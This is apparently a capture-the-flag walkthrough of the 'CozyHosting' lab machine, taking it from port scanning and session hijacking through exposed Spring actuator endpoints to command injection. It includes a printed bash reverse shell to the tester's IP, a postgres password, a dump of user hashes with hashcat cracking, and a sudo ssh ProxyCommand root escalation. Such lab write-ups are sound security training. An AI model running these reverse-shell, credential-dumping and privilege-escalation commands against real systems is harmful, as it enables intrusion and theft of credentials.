We can begin with a port scan as usual:
╰─ nmap -sC -sV 10.129.110.213
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 10:17 EDT
Nmap scan report for 10.129.110.213
Host is up (0.030s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 43:56:bc:a7:f2:ec:46:dd:c1:0f:83:30:4c:2c:aa:a8 (ECDSA)
|_ 256 6f:7a:6c:3f:a6:8d:e2:75:95:d4:7b:71:ac:4f:7e:42 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://cozyhosting.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds
We can add cozyhosting.htb to our /etc/hosts file and take a look at the site.
The site has a login page, but we aren’t able to make an account. While we look at the site a bit more, we can spin up some directory enumeration:
╰─ dirsearch -u http://cozyhosting.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/cozyhosting.htb/-_23-09-04_10-19-20.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-09-04_10-19-20.log
Target: http://cozyhosting.htb/
[10:19:20] Starting:
[10:19:27] 200 - 0B - /Citrix//AccessPlatform/auth/clientscripts/cookies.js
[10:19:31] 400 - 435B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:19:32] 400 - 435B - /a%5c.aspx
[10:19:33] 200 - 634B - /actuator
[10:19:34] 200 - 95B - /actuator/sessions
[10:19:34] 200 - 10KB - /actuator/mappings
[10:19:34] 200 - 5KB - /actuator/env
[10:19:34] 200 - 15B - /actuator/health
[10:19:34] 200 - 124KB - /actuator/beans
[10:19:34] 401 - 97B - /admin
[10:19:53] 200 - 0B - /engine/classes/swfupload//swfupload_f9.swf
[10:19:53] 200 - 0B - /engine/classes/swfupload//swfupload.swf
[10:19:53] 500 - 73B - /error
[10:19:53] 200 - 0B - /examples/jsp/%252e%252e/%252e%252e/manager/html/
[10:19:53] 200 - 0B - /extjs/resources//charts.swf
[10:19:56] 200 - 0B - /html/js/misc/swfupload//swfupload.swf
[10:19:57] 200 - 12KB - /index
[10:20:00] 200 - 4KB - /login
[10:20:00] 200 - 0B - /login.wdm%2e
[10:20:01] 204 - 0B - /logout
[10:20:12] 400 - 435B - /servlet/%C0%AE%C0%AE%C0%AF
Task Completed
We see some interesting actuator directories and looking at /sessions shows the following:
Interesting, we can try to go to the /admin endpoint, but we get redirected to the login page. Let’s try to capture the request in Burp Suite and see what we can figure out.
You can capture a login request to get a session ID that we can swap out with the kanderson session ID:
Then, we can forward the request and log into the admin page:
We can create new connections from this dashboard, so let’s capture a request from it and play around with what types of inputs it will take.
If you try some of the common command injection payloads from HackTricks, you’ll be able to reach out to your own IP address:
Then on our python HTTP server:
╰─ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.110.213 - - [04/Sep/2023 11:40:22] "GET / HTTP/1.1" 200 -
We can further this by making a bash reverse shell that the target will request and run, which should send us a shell on our listening port.
Here is my reverse shell:
╰─ cat shell.sh
/bin/bash -i >& /dev/tcp/10.10.14.18/1337 0>&1
Here is my request in Burp Suite:
And on my listener we get a shell:
╰─ nc -lvp 1337
listening on [any] 1337 ...
connect to [10.10.14.18] from cozyhosting.htb [10.129.110.213] 42416
bash: cannot set terminal process group (1000): Inappropriate ioctl for device
bash: no job control in this shell
app@cozyhosting:/app$
We see a .jar archive, so we can download it with the same python server strategy and we can take a look at it in our browser using some online java decompiler:
We get a password for postgresql, so we can use that to read tables in our shell:
app@cozyhosting:/app$ psql -U postgres -W -h localhost -d cozyhosting
psql -U postgres -W -h localhost -d cozyhosting
Password: Vg&nvzAQ7XxR
\list
List of databases
Name | Owner | Encoding | Collate | Ctype | Access privileges
-------------+----------+----------+-------------+-------------+-----------------------
cozyhosting | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
postgres | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 |
template0 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
template1 | postgres | UTF8 | en_US.UTF-8 | en_US.UTF-8 | =c/postgres +
| | | | | postgres=CTc/postgres
(4 rows)
\c cozyhosting
Password: Vg&nvzAQ7XxR
You are now connected to database "cozyhosting" as user "postgres".
\d
List of relations
Schema | Name | Type | Owner
--------+--------------+----------+----------
public | hosts | table | postgres
public | hosts_id_seq | sequence | postgres
public | users | table | postgres
(3 rows)
SELECT * FROM users;
name | password | role
-----------+--------------------------------------------------------------+-------
kanderson | $2a$10$---SNIP---im | User
admin | $2a$10$---SNIP---dm | Admin
(2 rows)
We can take these hashes and crack them with hashcat:
╰─ hashcat -m 3200 hashes.txt ~/Desktop/Useful-Misc./rockyou.txt
Then, we can try to SSH in as the josh user. *We know about josh because in out first shell, we can read the /etc/passwd file to see a list of users. *
╰─ ssh josh@cozyhosting.htb
josh@cozyhosting.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-82-generic x86_64)
---SNIP---
Last login: Mon Sep 4 16:13:31 2023 from 10.10.14.18
josh@cozyhosting:~$ ls
user.txt
We can use sudo -l to view our privileged permissions:
josh@cozyhosting:~$ sudo -l
[sudo] password for josh:
Matching Defaults entries for josh on localhost:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User josh may run the following commands on localhost:
(root) /usr/bin/ssh *
If you go on GTFOBins you’ll be able to find a payload that gets us a shell as root:
josh@cozyhosting:~$ sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
# id
uid=0(root) gid=0(root) groups=0(root)